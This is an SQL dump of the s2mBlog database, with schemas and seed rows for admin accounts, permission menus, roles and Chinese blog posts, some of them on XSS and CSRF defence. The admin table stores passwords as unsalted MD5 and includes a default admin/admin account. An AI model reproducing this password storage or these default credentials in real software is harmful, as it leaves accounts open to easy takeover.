/*
Navicat MariaDB Data Transfer

Source Server         : www.s2m.cc
Source Server Version : 50541
Source Host           : www.s2m.cc:3306
Source Database       : s2mBlog

Target Server Type    : MariaDB
Target Server Version : 50541
File Encoding         : 65001

Date: 2015-09-29 13:51:59
*/

SET FOREIGN_KEY_CHECKS=0;

-- ----------------------------
-- Table structure for admin
-- ----------------------------
DROP TABLE IF EXISTS `admin`;
CREATE TABLE `admin` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `pwd` varchar(32) NOT NULL,
  `dateLogin` datetime DEFAULT NULL,
  `ipLogin` varchar(200) DEFAULT NULL,
  `realname` varchar(200) NOT NULL,
  `mobile` varchar(32) NOT NULL,
  `isLock` bit(1) NOT NULL DEFAULT b'0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=21 DEFAULT CHARSET=utf8;

-- ----------------------------
-- Records of admin
-- ----------------------------
INSERT INTO `admin` VALUES ('1', 'admin', '21232f297a57a5a743894a0e4a801fc3', '2015-09-29 13:44:15', '127.0.0.1', 's2mBlog', '18600000000', '\0');
INSERT INTO `admin` VALUES ('20', 'guest', '40f5888b67c748df7efba008e7c2f9d2', '2015-09-22 15:32:56', '127.0.0.1', '游客', '13500000000', '\0');

-- ----------------------------
-- Table structure for admin_actions
-- ----------------------------
DROP TABLE IF EXISTS `admin_actions`;
CREATE TABLE `admin_actions` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `url` varchar(255) NOT NULL,
  `pid` int(11) NOT NULL DEFAULT '0',
  `level` int(11) NOT NULL DEFAULT '0' COMMENT '菜单等级',
  `paixu` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=85 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of admin_actions
-- ----------------------------
INSERT INTO `admin_actions` VALUES ('37', '定时任务记录', '/admin/sysTaskLog/list', '0', '0', '50');
INSERT INTO `admin_actions` VALUES ('38', '权限设置', '/admin/adminActions/list', '0', '0', '10');
INSERT INTO `admin_actions` VALUES ('39', '添加/修改', '/admin/adminActions/add', '38', '1', '0');
INSERT INTO `admin_actions` VALUES ('40', '添加/设置保存', '/admin/adminActions/save', '39', '2', '0');
INSERT INTO `admin_actions` VALUES ('42', '删除', '/admin/adminActions/del', '38', '1', '0');
INSERT INTO `admin_actions` VALUES ('43', '定时任务', '/admin/sysTaskHandel/list', '0', '0', '40');
INSERT INTO `admin_actions` VALUES ('44', '开启/关闭', '/admin/sysTaskHandel/enable', '43', '1', '0');
INSERT INTO `admin_actions` VALUES ('45', '后台首页', '/admin', '0', '0', '0');
INSERT INTO `admin_actions` VALUES ('46', '文章管理', '/admin/articles/list', '0', '0', '80');
INSERT INTO `admin_actions` VALUES ('47', '添加/修改', '/admin/articles/add', '46', '1', '0');
INSERT INTO `admin_actions` VALUES ('48', '添加/设置保存', '/admin/articles/save', '47', '2', '0');
INSERT INTO `admin_actions` VALUES ('49', '删除', '/admin/articles/del', '46', '1', '0');
INSERT INTO `admin_actions` VALUES ('50', '系统日志', '/admin/sysLog/list', '0', '0', '60');
INSERT INTO `admin_actions` VALUES ('51', '角色管理', '/admin/roles/list', '0', '0', '20');
INSERT INTO `admin_actions` VALUES ('52', '添加/修改', '/admin/roles/add', '51', '1', '0');
INSERT INTO `admin_actions` VALUES ('53', '添加/设置保存', '/admin/roles/save', '52', '2', '0');
INSERT INTO `admin_actions` VALUES ('54', '删除', '/admin/roles/del', '51', '1', '0');
INSERT INTO `admin_actions` VALUES ('57', '管理员管理', '/admin/admin/list', '0', '0', '30');
INSERT INTO `admin_actions` VALUES ('58', '添加/修改', '/admin/admin/add', '57', '1', '0');
INSERT INTO `admin_actions` VALUES ('59', '添加/设置保存', '/admin/admin/save', '58', '2', '0');
INSERT INTO `admin_actions` VALUES ('61', '启用/停用', '/admin/admin/stop', '57', '1', '0');
INSERT INTO `admin_actions` VALUES ('62', '退出登录', '/admin/loginout', '0', '0', '0');
INSERT INTO `admin_actions` VALUES ('64', '评论管理', '/admin/comment/list', '0', '0', '100');
INSERT INTO `admin_actions` VALUES ('65', '查看详情', '/admin/comment/add', '64', '1', '0');
INSERT INTO `admin_actions` VALUES ('66', '回复评论', '/admin/comment/save', '64', '1', '0');
INSERT INTO `admin_actions` VALUES ('67', '系统设置', '/admin/sysConfig/list', '0', '0', '35');
INSERT INTO `admin_actions` VALUES ('68', '添加/修改', '/admin/sysConfig/add', '67', '1', '0');
INSERT INTO `admin_actions` VALUES ('69', '添加/设置保存', '/admin/sysConfig/save', '68', '2', '0');
INSERT INTO `admin_actions` VALUES ('70', '删除', '/admin/sysConfig/del', '67', '1', '0');
INSERT INTO `admin_actions` VALUES ('72', '查看详情', '/admin/sysConfig/view', '67', '1', '0');
INSERT INTO `admin_actions` VALUES ('73', '清空日志', '/admin/sysLog/clearLogs', '50', '1', '0');
INSERT INTO `admin_actions` VALUES ('76', '微信管理员', '/admin/weixinAdmin/list', '0', '0', '110');
INSERT INTO `admin_actions` VALUES ('77', '添加授权', '/admin/weixinAdmin/add', '76', '1', '0');
INSERT INTO `admin_actions` VALUES ('78', '删除授权', '/admin/weixinAdmin/del', '76', '1', '0');
INSERT INTO `admin_actions` VALUES ('80', '标签管理', '/admin/tags/list', '0', '0', '70');
INSERT INTO `admin_actions` VALUES ('81', '添加/修改', '/admin/tags/add', '80', '1', '0');
INSERT INTO `admin_actions` VALUES ('82', '添加/设置保存', '/admin/tags/save', '81', '2', '0');
INSERT INTO `admin_actions` VALUES ('83', '查看详情', '/admin/sysLog/view', '50', '1', '0');
INSERT INTO `admin_actions` VALUES ('84', '删除', '/admin/comment/del', '64', '1', '0');

-- ----------------------------
-- Table structure for admin_role_actions
-- ----------------------------
DROP TABLE IF EXISTS `admin_role_actions`;
CREATE TABLE `admin_role_actions` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `rid` int(11) NOT NULL,
  `aid` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=59 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of admin_role_actions
-- ----------------------------
INSERT INTO `admin_role_actions` VALUES ('40', '1', '45');
INSERT INTO `admin_role_actions` VALUES ('41', '1', '51');
INSERT INTO `admin_role_actions` VALUES ('42', '1', '52');
INSERT INTO `admin_role_actions` VALUES ('43', '1', '53');
INSERT INTO `admin_role_actions` VALUES ('44', '1', '54');
INSERT INTO `admin_role_actions` VALUES ('45', '1', '38');
INSERT INTO `admin_role_actions` VALUES ('46', '1', '39');
INSERT INTO `admin_role_actions` VALUES ('47', '1', '40');
INSERT INTO `admin_role_actions` VALUES ('48', '1', '42');
INSERT INTO `admin_role_actions` VALUES ('49', '1', '43');
INSERT INTO `admin_role_actions` VALUES ('50', '1', '44');
INSERT INTO `admin_role_actions` VALUES ('51', '1', '37');
INSERT INTO `admin_role_actions` VALUES ('52', '1', '50');
INSERT INTO `admin_role_actions` VALUES ('53', '1', '46');
INSERT INTO `admin_role_actions` VALUES ('54', '1', '47');
INSERT INTO `admin_role_actions` VALUES ('55', '1', '48');
INSERT INTO `admin_role_actions` VALUES ('56', '1', '49');
INSERT INTO `admin_role_actions` VALUES ('57', '1', '64');
INSERT INTO `admin_role_actions` VALUES ('58', '1', '65');

-- ----------------------------
-- Table structure for admin_roles
-- ----------------------------
DROP TABLE IF EXISTS `admin_roles`;
CREATE TABLE `admin_roles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `aid` int(11) NOT NULL,
  `rid` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of admin_roles
-- ----------------------------
INSERT INTO `admin_roles` VALUES ('5', '20', '1');

-- ----------------------------
-- Table structure for articles
-- ----------------------------
DROP TABLE IF EXISTS `articles`;
CREATE TABLE `articles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `url` varchar(100) NOT NULL,
  `title` varchar(255) NOT NULL,
  `profile` varchar(1000) NOT NULL,
  `author` varchar(255) NOT NULL,
  `date_add` datetime NOT NULL,
  `views` int(11) NOT NULL DEFAULT '0',
  `comments` int(11) NOT NULL DEFAULT '0',
  `type` int(11) NOT NULL DEFAULT '0' COMMENT '0 普通 1推荐',
  `pic` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=69 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of articles
-- ----------------------------
INSERT INTO `articles` VALUES ('12', 'about', '关于 s2mBlog', 's2mBlog是基于JAVA的J2EE应用，采用 springMVC + mybatis + freemarker 等框架搭建的一款高性能、MVC分离，简易的博客系统。集成了memcached 缓存架构，从安全性角度，可避免 XSS、CSRF等脚本攻击。同时，该博客系统也可作为新项目的原始框架进行二次开发。', 's2m', '2015-09-17 10:40:43', '148', '1', '1', '');
INSERT INTO `articles` VALUES ('13', 'win-memcached', 'Windows平台下安装与配置Memcached的方法', '在Windows平台下安装与配置Memcached的方法,Memcached 是一个高性能的分布式内存对象缓存系统，用于动态Web应用以减轻数据库负载', 's2m', '2015-09-17 13:20:48', '10', '0', '0', '');
INSERT INTO `articles` VALUES ('14', 'druid-view', '如何查看druid（数据库、性能、运行情况）监控数据', 'Druid是阿里巴巴开源平台上的一个项目，整个项目由数据库连接池、插件框架和SQL解析器组成。该项目主要是为了扩展JDBC的一些限制，可以让程序员实现一些特殊的需求，比如向密钥服务请求凭证、统计SQL信息、SQL性能收集、SQL注入检查、SQL翻译等，程序员可以通过定制来实现自己需要的功能。 ', 's2m', '2015-09-17 13:58:04', '13', '0', '0', '');
INSERT INTO `articles` VALUES ('15', 's2mBlog-pwd', '默认账号密码修改等安全事项', '任何东西不会只有优点没有缺点，开源程序也是一样的。选择开源程序做网站需要注意什么。', 's2m', '2015-09-17 14:41:03', '13', '0', '0', '');
INSERT INTO `articles` VALUES ('16', 'release-1.0.0', 's2mBlog-1.0.0正式发布了', 's2mBlog-1.0.0正式发布了，s2mBlog是基于JAVA的J2EE应用，采用 springMVC + mybatis + freemarker 等框架搭建的一款高性能、MVC分离，简易的博客系统。集成了memcached 缓存架构，从安全性角度，可避免 XSS、CSRF等脚本攻击。同时，该博客系统也可作为新项目的原始框架进行二次开发。', 's2m', '2015-09-17 15:10:32', '198', '2', '0', '');
INSERT INTO `articles` VALUES ('17', 'mods-comment', '新增加评论留言功能', '新支持对博客评论功能，能有效防御XSS漏洞的威胁，同时，通过 token授权，避免 CSRF 跨域攻击；管理员可以针对评论进行回复、删除等操作，同一个IP地址，两次评论时间间隔不能低于1分钟，防止恶意评论；博客右侧通过便签读取最新评论信息', 's2m', '2015-09-21 17:12:52', '17', '3', '0', '');
INSERT INTO `articles` VALUES ('18', 'xss', 'XSS漏洞攻击危害及防御 ', 'XSS又称CSS，全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞，XSS属于被动式且用于客户端的攻击方式，所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码，当其它用户浏览该网站时，这段HTML代码会自动执行，从而达到攻击的目的。如，盗取用户Cookie、破坏页面结构、重定向到其它网站等。', 's2m', '2015-09-21 17:41:28', '7', '0', '0', '');
INSERT INTO `articles` VALUES ('19', 'csrf', 'CSRF攻击介绍及防御', 'CSRF跨站点请求伪造(Cross&mdash;Site Request Forgery)，跟XSS攻击一样，存在巨大的危害性，你可以这样来理解：\r\n攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转账等。 如下：其中Web A为存在CSRF漏洞的网站，Web B为攻击者构建的恶意网站，User C为Web A网站的合法用户。', 's2m', '2015-09-21 17:43:07', '11', '0', '0', '');
INSERT INTO `articles` VALUES ('20', 'jar-upgrade', '框架底层架包JAR升级', '框架底层架包JAR升级,Spring MVC 升级至 4.2.1.RELEASE 版本\r\nfastjson 升级至 1.2.7 版本', 's2m', '2015-09-22 10:17:28', '13', '0', '0', 'http://img.s2m.cc/s2m/2015/09/21/32c4099dce7b0daa507efa723fe51454.png');
INSERT INTO `articles` VALUES ('21', 'mods-indexPic', '新增加封面图片支持', '发布博文的时候支持为博文增加封面图片，使得您的博客看起来更加图文并茂显得生意勃勃，同时也避免博客清一色全是文字给用户造成视觉审美疲劳~', 's2m', '2015-09-22 13:47:44', '11', '1', '0', '');
INSERT INTO `articles` VALUES ('23', 'mods-roles', '新增多管理员权限体系（权限、角色）', '系统自动检测后台URI，以URI为基础作为权限的判断依据，建立多角色分配不同的权限后，再为不同管理员分配多种不同的组合角色。有助于多管理员协同维护系统，不同用户基于不同权限设置，达到高效管理、信息安全。', 's2m', '2015-09-22 16:14:06', '17', '1', '0', 'http://img.s2m.cc/s2m/2015/09/22/c840fe18ed636d17c6dd36d864b8ff2a.png');
INSERT INTO `articles` VALUES ('24', 'release-2.0.0', 's2mBlog-2.0.0正式发布了', 's2mBlog-2.0.0正式发布了，s2mBlog是基于JAVA的J2EE应用，采用 springMVC + mybatis + freemarker 等框架搭建的一款高性能、MVC分离，简易的博客系统。集成了memcached 缓存架构，从安全性角度，可避免 XSS、CSRF等脚本攻击。同时，该博客系统也可作为新项目的原始框架进行二次开发。', 's2m', '2015-09-22 17:08:20', '43', '0', '0', '');
INSERT INTO `articles` VALUES ('25', 'log4j2-database', '如何配置log4j2日志记录至数据库', 'log4j2可灵活的将日志打印在控制台、通过SMTP邮件发送、记录至文件、保存至数据库。本文介绍如何配置log4j2将日志记录至数据库', 's2m', '2015-09-23 10:29:28', '11', '0', '0', '');
INSERT INTO `articles` VALUES ('26', 'scheduling-task', '如何实现基于scheduling的自动定时任务', '基于scheduling 的定时任务框架高度整合，免去了复杂的XML配置，结合数据库、后台便捷操作控制任务停启用，查看定时任务执行记录，任务是否成功执行一目了然。', 's2m', '2015-09-23 11:09:16', '48', '1', '0', 'http://img.s2m.cc/s2m/2015/09/22/abaf78fda5a12d42d2b8ac6f1915b7ed.png');
INSERT INTO `articles` VALUES ('62', 'mods-weixin', 'S2M支持微信公众号了！可以用微信写博文、发图片和视频喽！', '经过紧锣密鼓的开发，s2mBlog现在支持绑定微信公众号喽！真是特大好消息。可以通过公众号，获取最新博文、通过关键词搜索博文、同时，您可以将图片、视频、小视频直接发送至微信公众号，实现随时随地便捷的发博文。', 's2m', '2015-09-28 18:07:50', '26', '1', '1', 'http://img.s2m.cc/s2m/2015/09/28/257225a4ce90b92c321a291401152748.png');
INSERT INTO `articles` VALUES ('66', 'wx66', '分享自微信：2015-09-29', '分享至微信公众号：', 'S2M', '2015-09-29 09:18:13', '48', '2', '0', 'http://img.s2m.cc/s2m/2015/09/29/fb6b5f8ef9aaf80d670e509356fe802a.jpg');
INSERT INTO `articles` VALUES ('67', 'mods-clould', 's2m为什么要选择云存储作为图片、视频、附件的保存', 's2m为什么要选择云存储作为图片、视频、附件的保存？云存储除了可以分担网站的流量访问，提升网站的快速响应，后期还可以无缝结合CDN实现高速缓存，还能保证了附件和程序分离，达到最大的安全性，同时，在后期分布式集群部署的时候，也无需考虑附件这块的各种问题', 's2m', '2015-09-29 09:49:45', '6', '0', '0', 'http://img.s2m.cc/s2m/2015/09/28/da1e3d4ffbb5556cc6166b59a573cb3f.png');
INSERT INTO `articles` VALUES ('68', 'mods-pre-next', '新增上一篇、下一篇、相关博文功能', '新增上一篇、下一篇、相关博文功能，方便用户快速导航浏览博文，通过标签匹配相关博文，提升用户体验', 's2m', '2015-09-29 11:19:42', '4', '0', '0', '');

-- ----------------------------
-- Table structure for articles_content
-- ----------------------------
DROP TABLE IF EXISTS `articles_content`;
CREATE TABLE `articles_content` (
  `id` int(11) NOT NULL,
  `content` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of articles_content
-- ----------------------------
INSERT INTO `articles_content` VALUES ('2', '<section class=\"post-content\"><blockquote><p><code>{{ghost_foot}}</code> 助手函数将不再输出 jQuery 链接了。</p></blockquote><p>从 Ghost 第一个版本开始， <code>{{ghost_foot}}</code> 助手函数默认都会输出一个 jQuery \r\n文件链接，并且这个文件还是本地存储的。最开始 Ghost 团队觉得这是一件对所有主题开发者有意义的事情，因此就把这个功能加入 Ghost \r\n核心代码里了。但是，现在越来越觉得这是一个非常糟糕的决定！因为根本没有给开发者提供去掉 jQeury 的后门。这也就有了 Ghost \r\n中文网在发布的各个 Ghost 中文版中为 <code>{{ghost_foot}}</code> 助手增加了一个开关 <code>jquery=false</code> 用于<a href=\"http://www.ghostchina.com/disable-jquery-link-in-ghost_foot-helper/\">去除 jQuery</a>。</p><p>Ghost 团队总算意识到这个 shit 决定了，在即将发布的 0.7 版本中将不再输出 jQuery 链接。</p><p>对于目前已经存在的 Ghost 主题和已经上线的 Ghost 博客来说，这个改变可能造成不小的麻烦。因此，Ghost 团队决定采用如下方式帮大家平滑过渡：<strong>对于新创建的博客不再输出 jQeury 链接</strong>；对已经在线上运行的博客，将在 <a href=\"http://support.ghost.org/use-code-injection/\">插入代码</a> 功能页面自动填充一个引用 jQuery 的 <code>&lt;script&gt;</code> 标签，这个标签将会随着 <code>{{ghost_foot}}</code> 助手输出，也就是说比以前的输出方式绕了个弯，但是对于用户来说可能没有太明显的感知。</p><p>关于这个问题的讨论可以看这里 <a href=\"https://github.com/TryGhost/Ghost/issues/5298\">issue on GitHub</a>。</p><h2 id=\"\">如何升级现有主题</h2><p>Ghost 0.7 很快就要发布了，升级时一定要确认做了如下准备工作：</p><p>建议大家看一下自己的主题源码，以 <code>casper-zh</code> 主题为例，在 <code>contents/themes/casper-zh/</code> 目录下有一个 <code>default.hbs</code> 文件，打开这个文件，看看文件末尾是否有明显的 jQuery 链接，如果没有，那就是依赖 <code>{{ghost_foot}}</code> 输出了，建议大家手动添加一个 jQuery 链接，比如使用 <a href=\"http://www.bootcdn.cn/jquery/\">BootCDN</a> 提供的免费 CDN 服务：</p><pre><code class=\"hljs xml\"><span class=\"hljs-tag\">&lt;<span class=\"hljs-title\">script</span> <span class=\"hljs-attribute\">src</span>=<span class=\"hljs-value\">&quot;//cdn.bootcss.com/jquery/1.11.3/jquery.min.js&quot;</span>&gt;</span><span class=\"undefined\"></span><span class=\"hljs-tag\">&lt;/<span class=\"hljs-title\">script</span>&gt;</span> &nbsp;</code></pre>\r\n &nbsp; &nbsp;</section><p><br/></p>');
INSERT INTO `articles_content` VALUES ('12', '<p>s2mBlog&nbsp;正式版已经发布了，该版本有完善的后台体系，完整的大型项目框架整合，适合作为新项目开发的原始框架。</p><p>同时，s2mBlog&nbsp;将会定期升级整合最新 JAR&nbsp;包，保证系统安全的前提下，也使得让大家及时使用到最新的功能和体验最新的性能，敬请期待。</p><h2 id=\"ghost070\">s2mBlog 框架：</h2><ul><li>SpringMvc</li><li>Mybatis <br/></li><li>Freemarker <br/></li><li>Log4j2</li></ul><h2 id=\"ghost070\">主要功能：</h2><ol><li>基于captcha的图形验证码功能，可灵活配置；</li><li>基于memcached缓存体系，可用于搭建高并发项目；</li><li>严格按照 MVC&nbsp;体系，将数据库体系、程序编码体系、前端页面交互合理分开；</li><li>基于freemarker模板，采用 HTML&nbsp;页面加上适量标签取代繁琐的JSP页面；</li><li>持久层采用 Mybatis ，接近原生，摒弃了数据库层面耗费系统资源且性能低下等功能；</li><li>项目全程采用LOG4J2作为日志框架，包括控制台输出、记录到文件、严重错误发送邮件提醒、将日志记录至数据库；</li><li>图片、视频、附件上传保存在云存储，提升浏览速度、安全性能、稳定性；<br/></li><li>完善的管理员权限体系，将权限分配给特定的角色，再给管理员分配一系列的角色进行系统管理；</li><li>博客支持封面图片功能，不再是单调的文字；</li><li>框架底层架包定期升级，保证性能的同时，杜绝因为底层漏洞而导致系统损失；</li><li>支持游客评论，管理员可进行回复；</li><li>基于 scheduling&nbsp;的定时任务功能，可在后台配置某个任务开启或者关闭（不再是繁琐的在XML文件中配置），详细记录每次定时任务的执行情况；</li><li>基于阿里巴巴&nbsp; druid&nbsp;的系统运行情况监控功能，可随时在线查看数据库、连接池、事务、访问量、并发、在线人数，便于快速分析系统性能和瓶颈；</li><li>整合微信公众号功能，微信用户可直接查看最新博文、搜索博文、管理员可简单的将照片、视频发送至公众号实现快速发博文；<br/></li><li>专业团队维护，定期升级并推出更多功能，更多精彩敬请期待官网，同时也期待大家的宝贵意见<br/></li></ol><h2 id=\"ghost070\">数据库：</h2><p>s2mBlog 采用Mysql作为数据库存储，建议采用 5.0&nbsp;以上版本，数据库连接池采用&nbsp;阿里巴巴的 druid&nbsp;连接池，同时提供数据库运行环境监控、SQL监控、事务监控&nbsp;等功能。</p><h2 id=\"ghost070\">Memcached&nbsp;缓存：</h2><p>项目集成了&nbsp;memcached缓存功能，可直接实现方法级缓存（可实现方法层面直接返回缓存数据而无需执行方法内程序，大大提升系统性能）</p><h2 id=\"ghost070\">系统后台：</h2><p>后台基于 Bootstrap&nbsp;框架构建，独立完善的后台管理体系，配置了&nbsp;用 LOG4J2&nbsp;实现的系统日志功能，定时任务框架，统一标准化单号生成规范（例如在高并发、分布式环境下快速生成唯一的订单号、流水编号等）<br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/62aaf754819cce877080b8ae55aebfb0.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/62aaf754819cce877080b8ae55aebfb0.png\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/186739a7f7de9f94017b7234d623c31a.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/186739a7f7de9f94017b7234d623c31a.png\"/></p><p><br/></p><p><br/></p>');
INSERT INTO `articles_content` VALUES ('13', '<p>在Windows平台下安装与配置Memcached的方法,Memcached 是一个高性能的分布式内存对象缓存系统，用于动态Web应用以减轻数据库负载</p><p>Memcached \r\n是一个高性能的分布式内存对象缓存系统，用于动态Web应用以减轻数据库负载。它通过在内存中缓存数据和对象来减少读取数据库的次数，从而提供动态、数据\r\n库驱动网站的速度。Memcached基于一个存储键/值对的hashmap。其守护进程（daemon \r\n）是用C写的，但是客户端可以用任何语言来编写，并通过memcached协议与守护进程通信。但是它并不提供冗余（例如，复制其hashmap条目）；\r\n当某个服务器S停止运行或崩溃了，所有存放在S上的键/值对都将丢失。 <br/><br/>　　Memcached由Danga \r\nInteractive开发，其最新版本发布于2010年，作者为Anatoly Vorobey和Brad \r\nFitzpatrick。用于提升LiveJournal . \r\ncom访问速度的。LJ每秒动态页面访问量几千次，用户700万。Memcached将数据库负载大幅度降低，更好的分配资源，更快速访问。 <br/><br/><br/>一、下载Memercached For Windows <br/><br/>下载地址：<a title=\"本地下载\" target=\"_blank\" href=\"http://img.s2m.cc/s2m/2015/09/17/9e5d78c5355006f89873db3fe6ee782f.rar\">本地下载</a><br/></p><p><img alt=\"\" src=\"http://files.jb51.net/file_images/article/201205/201205212334502.jpg\"/><br/><br/><strong>二、安装步骤 <br/></strong><br/>1、解压到指定目录，如：C:\\Memcached。 <br/>2、用cmd打开命令窗口，转到解压的目录，输入 “memcached.exe -d install”。 <br/>3、打开控制面板，打开服务，可以看到memcached已经在上面可，如果没有启动，则手动启动一下。 <br/></p><p><img alt=\"\" src=\"http://files.jb51.net/file_images/article/201205/201205212334503.jpg\"/></p><p>4、使用telnet命令 验证缓存服务器是否可用。</p><p><img alt=\"\" src=\"http://files.jb51.net/file_images/article/201205/201205212334504.jpg\"/></p><p>开始什么都不显示，回车后输入命令&nbsp; stats&nbsp; 查看统计信息，如下图，说明服务器运作正常。</p><p><img alt=\"\" src=\"http://files.jb51.net/file_images/article/201205/201205212334505.jpg\"/></p><p><strong>三、参数介绍 <br/><br/></strong>1、 以上的安装和启动都是在默认环境下进行的，在安装时可设置如下参数： <br/>-p 监听的端口 <br/>-l 连接的IP地址, 默认是本机 <br/>-d start 启动memcached服务 <br/>-d restart 重起memcached服务 <br/>-d stop|shutdown 关闭正在运行的memcached服务 <br/>-d install 安装memcached服务 <br/>-d uninstall 卸载memcached服务 <br/>-u 以的身份运行 (仅在以root运行的时候有效) <br/>-m 最大内存使用，单位MB。默认64MB <br/>-M 内存耗尽时返回错误，而不是删除项 <br/>-c 最大同时连接数，默认是1024 <br/>-f 块大小增长因子，默认是1.25 <br/>-n 最小分配空间，key+value+flags默认是48 <br/>-h 显示帮助 <br/>如：“memcached -d install -l 127.0.0.1 -m 1024 -c2048”。 <br/><br/>2、 如果在安装时没有添加参数，可通过修改注册表信息进行设置，打开注册表，找 <br/>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\memcached <br/>在其中有一个“ImagePath”项，值为： <br/>&quot;C:\\Memcached\\memcached-win32-1.4.4-14\\memcached.exe&quot; -d runservice <br/>在后面加上“-m 1024 -c2048”。如下图： <br/></p><p><img alt=\"\" src=\"http://files.jb51.net/file_images/article/201205/201205212334506.jpg\"/></p><p>3、输入stats命令后，页面出现的参数介绍。 <br/><br/>STAT pid 4356 服务器进程IDSTAT uptime \r\n56625 服务器运行时间，单位秒STAT time 1225249079 服务器当前的UNIX时间STAT \r\nversion1.1.0服务器的版本号STAT pointer_size 64STAT rusage_user 151.845489 \r\n该进程累计的用户时间(秒:微妙)STAT rusage_system 121.667603 该进程累计的系统时间(秒:微妙)STAT \r\nibuffer_size 4096STAT curr_connections 13 连接数量STAT total_connections \r\n54136 服务器运行以来接受的连接总数STAT connection_structures 318 服务器分配的连接结构的数量STAT \r\ncmd_get 100595 取回请求总数STAT cmd_set 6510 存储请求总数STAT get_hits 96543 \r\n请求成功的总次数STAT get_misses 4052 请求失败的总次数STAT bytes_read 4427679 \r\n服务器从网络读取到的总字节数STAT bytes_written 6585596 服务器向网络发送的总字节数 <br/><br/>备注： <br/><br/>uptime\r\n 是memcached运行的秒数，cmd_get是查询缓存的次数。 \r\ncmd_get/uptime得到平均每秒请求缓存的次数。cmd_set是设置key=&gt;value的次数。整个memcached是个大\r\nhash，用cmd_get没有找到的内容，就会调用cmd_set写进缓存里。get_hits是缓存命中的次数，缓存命中率 = \r\nget_hits/cmd_get \r\n*100%。get_misses加上get_hits等于cmd_get。total_itemscurr_items表示现在在缓存中的键值对个数。\r\ntotal_items == cmd_set == \r\nget_misses，不过当可用最大内存用光时，如果memcached设置为删掉内容，上面的等式就不成立了。</p>');
INSERT INTO `articles_content` VALUES ('14', '<p>Druid是阿里巴巴开源平台上的一个项目，整个项目由数据库连接池、插件框架和SQL解析器组成。该项目主要是为了扩展JDBC的一些限制，可以让程序\r\n员实现一些特殊的需求，比如向密钥服务请求凭证、统计SQL信息、SQL性能收集、SQL注入检查、SQL翻译等，程序员可以通过定制来实现自己需要的功\r\n能。</p><h2 id=\"ghost070\">访问地址：</h2><p>http://您的域名/druid/</p><p>用户名和密码您可以在 WEB.XML&nbsp;文件中修改</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/60ba9536bce4060d9d9c11b1c21aacfb.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/60ba9536bce4060d9d9c11b1c21aacfb.png\"/></p><p>登陆进去，您即可查看您的项目运行环境：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/c32dc7fc396bf89e1fa375d4ae7f5619.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/c32dc7fc396bf89e1fa375d4ae7f5619.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/b932b514e2d3e4b1514cbdbdf306a5c9.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/b932b514e2d3e4b1514cbdbdf306a5c9.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/028fdf42152a9be92ac53d620da94a4b.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/028fdf42152a9be92ac53d620da94a4b.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/a3525cfce6a6d8851d49f2019c8d6082.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/a3525cfce6a6d8851d49f2019c8d6082.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/8fd510364529b7a2c469d2ff667fc605.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/8fd510364529b7a2c469d2ff667fc605.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/5721af86e5a883fd0f1967adb4c4b210.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/5721af86e5a883fd0f1967adb4c4b210.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/48e4ac53cbde8df2732dc79503d1db4d.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/48e4ac53cbde8df2732dc79503d1db4d.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/b13430785e0055958ffd9a740648eae6.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/b13430785e0055958ffd9a740648eae6.png\" style=\"\"/></p><p><br/></p><p><br/></p>');
